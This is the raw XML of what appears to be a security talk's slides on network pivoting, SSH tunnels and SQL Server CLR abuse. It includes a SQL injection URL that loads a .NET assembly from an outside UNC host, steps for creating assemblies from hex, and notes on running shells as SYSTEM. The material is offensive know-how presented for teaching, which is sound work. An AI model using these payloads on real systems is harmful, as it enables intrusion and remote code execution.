            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>tcpr</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="5173662"/>
            <a:ext cx="8229600" cy="935830"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0">
            <a:normAutofit fontScale="5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XP and IPV6</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>netsh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> &amp;&amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>portproxy</a:t>
            </a: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rgbClr val="989898"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="3200" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="989898"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> tunnel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989898"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="TextBox 12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2743200" y="3638122"/>
            <a:ext cx="1219200" cy="430887"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" smtClean="0"/>
              <a:t>Listens on port 55555</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Right Arrow 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1700212" y="3289299"/>
            <a:ext cx="2262187" cy="10382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Connects to pivot:55555</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Right Arrow 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4672013" y="3222109"/>
            <a:ext cx="2566987" cy="10382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Pivot connects to target</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Rectangle 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1524000" y="3497262"/>
            <a:ext cx="5715000" cy="4308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Proxied</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> connection between client and target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4"/>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5"/>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animBg="1"/>
      <p:bldP spid="10" grpId="1" animBg="1"/>
      <p:bldP spid="12" grpId="0"/>
      <p:bldP spid="13" grpId="0"/>
      <p:bldP spid="13" grpId="1"/>
      <p:bldP spid="14" grpId="0" animBg="1"/>
      <p:bldP spid="14" grpId="1" animBg="1"/>
      <p:bldP spid="15" grpId="0" animBg="1"/>
      <p:bldP spid="15" grpId="1" animBg="1"/>
      <p:bldP spid="16" grpId="0" animBg="1"/>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Loading .net Assemblies (UNC)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1219200"/>
            <a:ext cx="8229600" cy="4953000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Fortunately, like DLL’s this can be loaded from a UNC share too.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Profit!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(Of course all of this is do-able via an injection point)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://victim2k3.sp.com/login.asp? username=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>boo&amp;password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=boo'%20</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CREATE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>%20</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ASSEMBLY</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>%20</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>moo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>%20</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>FROM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>%20'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>\\196.31.150.117\temp_smb\moo.dll</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'—</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>But this still requires outbound </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2" invalidUrl="file://localhost%5C%5CUNC" action="ppaction://hlinkfile"/>
              </a:rPr>
              <a:t>\\UNC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> (which is still useful for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>squeeza</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> and DNS resolution), but remains ghetto!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="unc-clr.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="914400" y="2066489"/>
            <a:ext cx="6629400" cy="448111"/>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Loading .net Assemblies (0x1618..)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1295400"/>
            <a:ext cx="8229600" cy="4953000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>T-SQL Syntax allows the assembly to be created at runtime from the files raw hex.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>File.open("moo.dll”,"rb").read().unpack("H</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>*")</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="Symbol" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>["</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>4d5a90000300</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>000004000000ffff0......] </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buAutoNum type="arabicPeriod" startAt="2"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>CREATE ASSEMBLY moo FROM 0x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>4d5a90000300</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>....</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buAutoNum type="arabicPeriod" startAt="2"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>exec </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>HelloWorldSP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>  (Profit!)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>This makes creation via injection even easier!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="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Assemblies and Security </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Privs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>.</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20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Your created binary is by default placed inside a sand-box</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Assemblies are loaded as:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>SAFE [Calculations, No external Resources]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>EXTERNAL_ACCESS [Access to Disk, Environment, Almost everything with some restrictions]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>UNSAFE [God Help You! | Equivalent of Full Trust | Call unmanaged Code / Do Anything as SYSTEM]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>UnSafe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> Assemblies must be signed with a new CLR Signing procedure or</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>SA can set the Database to “Trustworthy”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="unsafe.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2216578" y="5715000"/>
            <a:ext cx="6927422" cy="526947"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst>
            <a:glow rad="101600">
              <a:schemeClr val="accent1">
                <a:alpha val="75000"/>
              </a:schemeClr>
            </a:glow>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 – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>SPSock.exe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do with this?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The fun is just beginning:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Effectively loading binaries into memory without noticeably affecting disk in an unusual manner!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>.net assembly to launch </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>calc.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> (as System)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>.net assembly to launch remote shell (System)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Squeeza</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> without the horrible T-SQL ?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>reDuh.clr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:sym typeface="Wingdings"/>
              </a:rPr>
              <a:t></a:t>
            </a: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reader_10-1.jpg"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:srcRect l="-5237" r="-5237"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blip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Squeeza</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings"/>
              </a:rPr>
              <a:t>&lt;-&gt; .db</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3" descr="reader_10-2.jpg"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:srcRect l="-5237" r="-5237"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blip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 CLR-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>serVUH</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3" descr="reader_10-3.jpg"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:srcRect l="-5237" r="-5237"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blip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noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2900" dirty="0" err="1" smtClean="0"/>
              <a:t>reDuh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2900" dirty="0" smtClean="0"/>
              <a:t>&lt;-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2900" dirty="0" err="1" smtClean="0"/>
              <a:t>Squueza</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2900" dirty="0" smtClean="0"/>
              <a:t>&lt;-&gt;DNS&lt;-&gt;SQL&lt;-&gt;CLR&lt;-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2900" dirty="0" err="1" smtClean="0"/>
              <a:t>serVUH</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2900" dirty="0" smtClean="0"/>
              <a:t>&lt;-&gt;RDP</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2900" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3" descr="reader_10-5.jpg"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:srcRect l="-3362" r="-3362"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blip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sz="3111" dirty="0" smtClean="0"/>
              <a:t>*.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3111" dirty="0" err="1" smtClean="0"/>
              <a:t>jsp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3111" dirty="0" smtClean="0"/>
              <a:t>/*.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3111" dirty="0" err="1" smtClean="0"/>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3111" dirty="0" smtClean="0"/>
              <a:t>/*.asp will be posted on:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="3111" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="3111" dirty="0" smtClean="0"/>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3111" dirty="0" err="1" smtClean="0"/>
              <a:t>www.sensepost.com/blog</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3111" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Questions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Picture 19" descr="images.jpeg"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="484982" y="3052931"/>
            <a:ext cx="423862" cy="545722"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="images.jpeg"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3860800" y="2900531"/>
            <a:ext cx="423862" cy="545722"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="Picture 13" descr="victim-icon.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3860800" y="2751812"/>
            <a:ext cx="1168400" cy="1168400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>SSH Tunnels (a)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1143000"/>
            <a:ext cx="8229600" cy="4953000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>SSH Tunnels are old hat (too)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Many people use the familiar –L switch to connect to other hosts near the box running </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>sshd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>:</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Gives us an encrypted tunnel to our target network.. but this </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>isnt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="5"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="989898"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A) the problem we set out to solve</a:t>
            </a:r>
